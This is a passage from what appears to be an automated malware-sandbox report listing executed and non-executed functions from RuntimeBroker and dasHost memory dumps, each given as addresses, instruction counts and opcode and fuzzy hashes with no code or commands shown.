                                                                                    • Instruction ID: 6c1e7f21bbef58ad4cb362fecbdbd7b707ee3e848c17034dc090492d7cc1d7b5
                                                                                    • Opcode Fuzzy Hash: f104c97747dfa0be6682d7cafb803721c77a285653e36eaee2bb5089e45fd32e
                                                                                    • Instruction Fuzzy Hash: 6DD09590B2E917C5F239464181B02BE72A1AF03700F60843FD29FC9AC1C92CB80AB282
                                                                                    Function 00007FFD347D7D6E Relevance: .0, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: da97df47a5e6a6cab08d7532fafa10deaa7554bbd3da3d2a7de4db783f42def5
                                                                                    • Instruction ID: f38bf66a006c170c1ae9b524b97de2f99a179fa237e523934497d78d299d699a
                                                                                    • Opcode Fuzzy Hash: da97df47a5e6a6cab08d7532fafa10deaa7554bbd3da3d2a7de4db783f42def5
                                                                                    • Instruction Fuzzy Hash: 97C08C60A0E503CFF229431080B13B93762AF03300F2184BAC64FCA6E6CD6C390AB291
                                                                                    Function 00007FFD343E06D0 Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction ID: f82b15cf4566523a7950caa2f1db4320d5d2b73e3e455da6e6d7941920eba9ac
                                                                                    • Opcode Fuzzy Hash: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction Fuzzy Hash: 29B01201DD744F00A84431BA18D20A670505B46100FC80070E70CC1185986D10D52252
                                                                                    Function 00007FFD347DD51F Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e0f385657c03c4a8835d62902beb2d1b481880570f86c5dfef95860fbeaa1c62
                                                                                    • Instruction ID: 895cad2487376738625a525a06445cf599bf6567383a6e5a4099299a27bd3bb4
                                                                                    • Opcode Fuzzy Hash: e0f385657c03c4a8835d62902beb2d1b481880570f86c5dfef95860fbeaa1c62
                                                                                    • Instruction Fuzzy Hash: 27C04C54F1E243DBE721966448E153826910F07205B5505B1D317CA2D3DCEC784872D1
                                                                                    Function 00007FFD347D726F Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dc45114f0a97db062a11a6099a2b65d04da59897f16541c1f900598dfd7e4ff4
                                                                                    • Instruction ID: 4ca24ba71510d6f50c0ea728fbd2d2d21d0aa53b7245a278bd93e4d89ab0dbbc
                                                                                    • Opcode Fuzzy Hash: dc45114f0a97db062a11a6099a2b65d04da59897f16541c1f900598dfd7e4ff4
                                                                                    • Instruction Fuzzy Hash: 89C04C80F1E38696A62115A405E10BC36900B172047550575D206C51C7D84D79096291
                                                                                    Function 00007FFD34904AC0 Relevance: .0, Instructions: 7COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3537780170.00007FFD34900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34900000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd34900000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cf0e64bb519b10ae7b66bf6e7cc8a0ce8774ef9b0a7fb8339891258614a5fc60
                                                                                    • Instruction ID: 153afb383dbbb6a7b7bb88e580eaae034d3e73b18429a5a0d6998616fd831bf1
                                                                                    • Opcode Fuzzy Hash: cf0e64bb519b10ae7b66bf6e7cc8a0ce8774ef9b0a7fb8339891258614a5fc60
                                                                                    • Instruction Fuzzy Hash: 44A00208D9780A01981932FA1DE70D474909BCA118FC71561EE18D0286E88E15E91393

                                                                                    Non-executed Functions

                                                                                    Function 00007FFD34902909 Relevance: 6.3, Strings: 5, Instructions: 64COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3537780170.00007FFD34900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34900000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd34900000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$.$;$R$U
                                                                                    • API String ID: 0-1005035953
                                                                                    • Opcode ID: 47d254148e0f093f5786f582ccf5dc6f24e9ebf3db524418e38fa012f6a1d4b2
                                                                                    • Instruction ID: 3473a2bc98db7f1562233505ea111cad128bf43462297e14ee08b69c65880885
                                                                                    • Opcode Fuzzy Hash: 47d254148e0f093f5786f582ccf5dc6f24e9ebf3db524418e38fa012f6a1d4b2
                                                                                    • Instruction Fuzzy Hash: D711263490D6814FF33547289894B7277A0FF47310F2141FED9AEC71D7D86C284A92A2
                                                                                    Function 00007FFD343E09B0 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                    • API String ID: 0-1692736845
                                                                                    • Opcode ID: 4d06fa6ffed6ec0bea91ab6bef49ed36b5857152e4a9dfd8c7293bbe64f4a6f1
                                                                                    • Instruction ID: 78f3e9710b42fb09f176b80e877fb26e293c00c2ed5e9a472b7ac096cb436e99
                                                                                    • Opcode Fuzzy Hash: 4d06fa6ffed6ec0bea91ab6bef49ed36b5857152e4a9dfd8c7293bbe64f4a6f1
                                                                                    • Instruction Fuzzy Hash: 9651B107B0A57646E32333FD74611EFABA89F8137AB5C4677E24CDB0838C1961C292E5
                                                                                    Function 00007FFD34902F00 Relevance: 5.0, Strings: 4, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3537780170.00007FFD34900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34900000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd34900000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: &$2$P$U
                                                                                    • API String ID: 0-3755486490
                                                                                    • Opcode ID: 4719397407d34695ec5a2bcf4ae8a57de34c2b2a7a1ab26fe03666176ecba273
                                                                                    • Instruction ID: a75d40882574a9e04e0586241e5f138e73fe1bf65b9fb3861de064a310f54149
                                                                                    • Opcode Fuzzy Hash: 4719397407d34695ec5a2bcf4ae8a57de34c2b2a7a1ab26fe03666176ecba273
                                                                                    • Instruction Fuzzy Hash: 13F0A730B0D5064BF368CB18E491B7A72D6FB49310F20827DCD6EC619AD93C594655D5

                                                                                    Executed Functions

                                                                                    Function 00007FFD343D0D48 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 5[_H
                                                                                    • API String ID: 0-3279724263
                                                                                    • Opcode ID: cff4c4279dfb1d8a15e708b514388b2ff4223e9497cb10a257170f53bbf84f74
                                                                                    • Instruction ID: 3e71e96c146801e9aa0acb39da0fc58e64352d6d97d5347098f3eb4baff9e4fb
                                                                                    • Opcode Fuzzy Hash: cff4c4279dfb1d8a15e708b514388b2ff4223e9497cb10a257170f53bbf84f74
                                                                                    • Instruction Fuzzy Hash: D491F175A19A898FE789EB6C88757E97FE1FB97304F0401BBC149D72D2CA791815C300
                                                                                    Function 00007FFD343D0E43 Relevance: .2, Instructions: 171COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1ce0eed792e2edf3c53c7d3e77ce806a8993cf8cb8cc5fbc6c709ef848ee8923
                                                                                    • Instruction ID: e65f006412e4566d7ea4882a35e926801221bff3802fb64471e7062388c04b61
                                                                                    • Opcode Fuzzy Hash: 1ce0eed792e2edf3c53c7d3e77ce806a8993cf8cb8cc5fbc6c709ef848ee8923
                                                                                    • Instruction Fuzzy Hash: 1751CF76A18A498BE798EB5C84757E87FE1FB9A714F5001BEC20DD77D1CABA18158300
                                                                                    Function 00007FFD343D08D0 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7H4
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: 212c8c925b9e172055eb89fdfd720c1d883e6128378e0dec7764c182828f588f
                                                                                    • Instruction ID: fa457c58b6c12b60b0c4b215dc8ba874b09a31fd8ca57e1c5d3cf62313353546
                                                                                    • Opcode Fuzzy Hash: 212c8c925b9e172055eb89fdfd720c1d883e6128378e0dec7764c182828f588f
                                                                                    • Instruction Fuzzy Hash: 1A415B12B4E6A61AE315B3BC60B92F96BA4DF86335F1445BBD24CC71D3CE2D688182C4
                                                                                    Function 00007FFD343D0998 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7H4
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: 5c61d63ca75aea4fd92967288635f9759ee31530db8652748f8b57f2f07c308b
                                                                                    • Instruction ID: a2a23a997fdf8bccdf7ed9d0e0f202fcb5fc265f17b875b95278ab6efacebc69
                                                                                    • Opcode Fuzzy Hash: 5c61d63ca75aea4fd92967288635f9759ee31530db8652748f8b57f2f07c308b
                                                                                    • Instruction Fuzzy Hash: 93210420B5D9590FE758F76C54B97B972C6EB8A321F0040BDE60EC32E3DE39AC418280
                                                                                    Function 00007FFD343D0960 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7H4
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: f050f396ae4da028cbdc51a6a3dbae03963fae5e0048a34aab3323ef58c3d976
                                                                                    • Instruction ID: 46fc15ba3399836c0b79511b29640811bd6eb1bddb88e5f3fe0ee023526a871f
                                                                                    • Opcode Fuzzy Hash: f050f396ae4da028cbdc51a6a3dbae03963fae5e0048a34aab3323ef58c3d976
                                                                                    • Instruction Fuzzy Hash: 14213B11B0DA561AF365B3BC24BA2F922D5DF8A366F1445BBE50DC31D3CD2EAC804284
                                                                                    Function 00007FFD343D1171 Relevance: .1, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5d21c021d5c16c112a72a4f97d0166ed3e5b009787cd6b7a6d2476e23fd3aa3b
                                                                                    • Instruction ID: 094a4634cc85e60e465933acea8d8e754e60b05054c9509193d41b131a89f8dc
                                                                                    • Opcode Fuzzy Hash: 5d21c021d5c16c112a72a4f97d0166ed3e5b009787cd6b7a6d2476e23fd3aa3b
                                                                                    • Instruction Fuzzy Hash: 23319231A0D68A8FDF46EB64C8A59A97BF0FF5B300B0805BBC009D71A3DA3DA845C751
                                                                                    Function 00007FFD343D0C25 Relevance: .1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: df00a4066b643880c2d59f1cc06834a4a3d84e103eada8c39de2040a8cccdad3
                                                                                    • Instruction ID: 24eda12cd9a6022ea02aa2f8bf9272e9b29073fb4f36e0cb2ed3e6b450d99e4f
                                                                                    • Opcode Fuzzy Hash: df00a4066b643880c2d59f1cc06834a4a3d84e103eada8c39de2040a8cccdad3
                                                                                    • Instruction Fuzzy Hash: 21210135B0E2898FE712EB2888A51DC7FB0EF83329F1445B7C280DF192D5391A4AA741
                                                                                    Function 00007FFD343D0C38 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: feb6da0effec433ac78246fa435cad5f14201ff76e807aeacd30111fc7347779
                                                                                    • Instruction ID: 3f96e98a21404424cbaacd5540ac77989398d89523c784de7e1146948ce8a7b1
                                                                                    • Opcode Fuzzy Hash: feb6da0effec433ac78246fa435cad5f14201ff76e807aeacd30111fc7347779
                                                                                    • Instruction Fuzzy Hash: D111CE35B0E7888FE702EB2898A42DD7FB0EF83319F1544B7C284DF292D5391A499780
                                                                                    Function 00007FFD343D0C40 Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e5b5af8b14389f6b2f348cb39dc5740f57e578ee045d4c683d3caf629a47149b
                                                                                    • Instruction ID: 6541a784fb46a1b52f8c29ef641667630fa5a2dcfa7baf3616abb2f26d24beba
                                                                                    • Opcode Fuzzy Hash: e5b5af8b14389f6b2f348cb39dc5740f57e578ee045d4c683d3caf629a47149b
                                                                                    • Instruction Fuzzy Hash: 1001AD35A0E7888FE702EB2884A42DD7FB0EF43314F1545EAC180DB292D5395A489B80
                                                                                    Function 00007FFD343D5EF1 Relevance: .0, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1367fdd2635cb4d8773ceb5b7bac313d56898e9429c9d2f2352ac406217a34ce
                                                                                    • Instruction ID: 9baded12b1604edbc2eb12ceec086a47201f661f8c663b4e58f9a3816c87e6f6
                                                                                    • Opcode Fuzzy Hash: 1367fdd2635cb4d8773ceb5b7bac313d56898e9429c9d2f2352ac406217a34ce
                                                                                    • Instruction Fuzzy Hash: CE012120E9D91D4AE7A5B61888B57BC61A1EF4B700F5001B5D91DE3292ED3E6D44A740
                                                                                    Function 00007FFD343D5F11 Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction ID: 7dddf225c71f9e7a0ec9b22fc1032d6338144fc44058bdbccf12c89b7a2c25cf
                                                                                    • Opcode Fuzzy Hash: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction Fuzzy Hash: 57016D30A9D40E8AEBA8BA04D8A5BF872A5EF16300F5001B9D90ED31A1EE3D29C55A41
                                                                                    Function 00007FFD343D0C48 Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8fde1c70c65ee5f2c51e3bfbdebf05f195a66c6b070661791eb3dbd4f6e18495
                                                                                    • Instruction ID: b138bdf6ada42a5344b5108d1015447a0bf97a31047aad3af935477e2d8f3502
                                                                                    • Opcode Fuzzy Hash: 8fde1c70c65ee5f2c51e3bfbdebf05f195a66c6b070661791eb3dbd4f6e18495
                                                                                    • Instruction Fuzzy Hash: C5015E35A0E7888FD712EB68C8941DDBFB0AF43314F1545EAC580DB1A2D5395A48D781
                                                                                    Function 00007FFD343D171D Relevance: .0, Instructions: 38COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7489425f6f9b40c95fa2af95c9024d1f7cb9f08cd1ab28ff000139e79b90c301
                                                                                    • Instruction ID: f50492136b2987b688fc1931f8646cca3e0f748b328fc24bc65f38785fcd79fc
                                                                                    • Opcode Fuzzy Hash: 7489425f6f9b40c95fa2af95c9024d1f7cb9f08cd1ab28ff000139e79b90c301
                                                                                    • Instruction Fuzzy Hash: B6F09622F4D5164BFB58F608C8A56EC3396EB92310F054676D50DD72D6DE2DAD0682C1
                                                                                    Function 00007FFD343D0C50 Relevance: .0, Instructions: 34COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a8829bf4592e40ae3b4fada442c1efe27b7aec2c3418eee2fc3db957c814b10c
                                                                                    • Instruction ID: 220322e8e1aa441e93854d38f7731614a4ebb86235473affcf0ae8e436dd0677
                                                                                    • Opcode Fuzzy Hash: a8829bf4592e40ae3b4fada442c1efe27b7aec2c3418eee2fc3db957c814b10c
                                                                                    • Instruction Fuzzy Hash: B9018F34A0E3888FE712EB6484941DDBFF0AF03308F1441EAC580DB192D9395A48C741
                                                                                    Function 00007FFD343D0B87 Relevance: .0, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e755c29a42b3ce14799ff74ec821416fd7e1b032b190bc4a9802ed2d1bd81a7d
                                                                                    • Instruction ID: 1024ff713126171387a3fc8aeef8a02c854a77d489bb69c09cd9b6fa1afbf811
                                                                                    • Opcode Fuzzy Hash: e755c29a42b3ce14799ff74ec821416fd7e1b032b190bc4a9802ed2d1bd81a7d
                                                                                    • Instruction Fuzzy Hash: 01E07D3232D94E4FDF02FB3CDC974A83B50EB8B21078700FAD108CB0A2C212684E8B01
                                                                                    Function 00007FFD343D4265 Relevance: .0, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction ID: c3574f17ea6472ccfd9d5795fce2fde2abe249d1d78e15150e0c03fe877680af
                                                                                    • Opcode Fuzzy Hash: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction Fuzzy Hash: 97E01A70F4911A4BFBA8B248D8E13F96264EF8A304F145078DB6ED33C5DD3DAD409605
                                                                                    Function 00007FFD343D06AD Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction ID: 3048f9248019bea7b6f186f8c5423cf2b2eab0437b84f9e769dd21ee3450d732
                                                                                    • Opcode Fuzzy Hash: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction Fuzzy Hash: 16C08C00FCB58B00B400316E18E60ECA120DBC7A28FD00032D30CD20959C3F20C5214A
                                                                                    Function 00007FFD343D12D8 Relevance: .0, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction ID: f2c7580b359e954caa7700577bdda0318b4c9fe2d3013718838c153da6db0bf5
                                                                                    • Opcode Fuzzy Hash: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction Fuzzy Hash: 3DC04C345558098FC948FB2DC99591477A0FB1A215BD50190E409C7171D66ADCD5D741
                                                                                    Function 00007FFD343D06D0 Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction ID: 735aa1df858eb5aeddf2c33aa0c7ee299a1304de0fead9086c4a11b781a4167b
                                                                                    • Opcode Fuzzy Hash: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction Fuzzy Hash: 26B01200DD748F00A40431BA08D60A47050AB47104FC00070D60CC1089987F10942242

                                                                                    Non-executed Functions

                                                                                    Function 00007FFD343D09B0 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                    • API String ID: 0-1692736845
                                                                                    • Opcode ID: 5c11b98ec9938e19b535ff5304182636e63fc7208d12de738dafda1f959acbdf
                                                                                    • Instruction ID: ea701b244c41a3dadb844275df2aec8f17d56ebb99556ec92d02f40348e8dd15
                                                                                    • Opcode Fuzzy Hash: 5c11b98ec9938e19b535ff5304182636e63fc7208d12de738dafda1f959acbdf
                                                                                    • Instruction Fuzzy Hash: 0151A007B0E56345E32233FD70611EE6BA8DF8233AB584677E24CDB0834D1A65C682E5

                                                                                    Executed Functions

                                                                                    Function 00007FFD34400D48 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
